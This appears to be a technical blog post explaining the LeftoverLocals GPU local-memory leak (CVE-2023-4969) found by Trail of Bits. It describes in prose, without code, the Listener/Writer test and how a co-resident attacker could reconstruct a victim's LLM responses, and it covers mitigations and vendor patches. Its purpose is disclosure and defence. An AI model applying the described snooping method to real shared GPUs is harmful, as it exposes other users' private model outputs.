LeftoverLocals: A New Threat to GPU Security in AI Applications

Welcome back to The Final Hop! Today, we're taking a technical deep dive into a recent groundbreaking discovery in the realm of cybersecurity: LeftoverLocals. This vulnerability, found by Tyler Sorensen and Heidy Khlaaf from Trail of Bits, poses a significant threat to the security of AI applications, particularly large language models (LLMs), running on various GPUs, including those from Apple, Qualcomm, AMD, and Imagination. Let's dissect what LeftoverLocals is, its mechanism, and the mitigation strategies available.

What is LeftoverLocals?

Overview: LeftoverLocals is a vulnerability allowing the recovery of data from GPU local memory that was created by another process. This breach significantly impacts GPU applications' security, particularly in LLMs and ML models. The vulnerability, tracked as CVE-2023-4969, was disclosed through a coordinated effort with major GPU vendors by the CERT Coordination Center.

Technical Details: LeftoverLocals leaks approximately 5.5 MB per GPU invocation, which can amount to about 181 MB for each LLM query on certain GPUs, like the AMD Radeon RX 7900 XT. This amount of data is substantial enough to reconstruct an LLM response with high precision. The discovery highlights unknown security risks in many parts of the ML development stack that have not been rigorously reviewed by security experts.

How Does LeftoverLocals Work?

Exploitation Requirements: The exploit is co-resident, meaning it can be implemented as another application or user on a shared machine. The attacker requires the ability to run GPU compute applications through frameworks like OpenCL, Vulkan, or Metal. The attacker reads data left in the GPU local memory by writing a GPU kernel that dumps this uninitialized local memory, an operation that can be executed with less than 10 lines of code.

The Listener and Writer: The exploitation process involves two programs: a Listener and a Writer. The Listener launches a GPU kernel that reads from uninitialized local memory and stores the results in the global memory, accessible by the CPU. The Writer, on the other hand, writes a canary value to the local memory. The CPU programs for both Listener and Writer launch their respective kernels repeatedly, and if the Listener reliably reads the canary values, the platform is deemed vulnerable to LeftoverLocals.

Listening to LLM Responses: In a multi-tenant GPU machine scenario, an attacker can exploit LeftoverLocals to listen to a victim's LLM responses. The process includes fingerprinting the victim's model by dumping local memory to identify sensitive components of linear algebra operations in the LLM architecture. The attacker then listens specifically for the execution of the output layer of the LLM, identified using weights or memory layout patterns obtained earlier. The entire layer input can be stolen, allowing the attacker to reproduce the final layer computation and uncover the DNN's final result.

Mitigation Strategies

User Mitigations: Users can defend against LeftoverLocals by modifying the source code of all GPU kernels that use local memory. Before the kernel ends, GPU threads should clear any used local memory locations. Users should ensure the compiler doesn’t remove these memory-clearing instructions, which can be difficult to verify due to the lack of GPU binary analysis tools.

Vendor Responses: Apple, AMD, and Qualcomm have acknowledged the vulnerability, with various responses and patching efforts underway. Apple has patched some devices, while AMD continues to investigate potential mitigation plans. Qualcomm has released a patch for some devices, but others may remain vulnerable.

Other Environments: Cloud providers and mobile applications present different contexts for vulnerability. While cloud GPU systems may not be currently vulnerable due to conservative GPU VM technology, mobile applications can exploit LeftoverLocals when a malicious listener app is run side-by-side with a victim app.

Conclusion

LeftoverLocals is a reminder of the inherent security risks in the rapidly evolving field of GPU-accelerated applications, especially in AI and machine learning. For developers, understanding and mitigating such vulnerabilities is crucial in ensuring the security of their applications. This discovery underscores the need for rigorous security reviews and updates in all layers of the ML development stack. As we continue to rely more on AI and machine learning, addressing vulnerabilities like LeftoverLocals becomes increasingly vital.

Stay tuned to The Final Hop for more in-depth analysis and updates on the latest developments in technology and cybersecurity. Your feedback is invaluable to us, so feel free to share your thoughts and questions!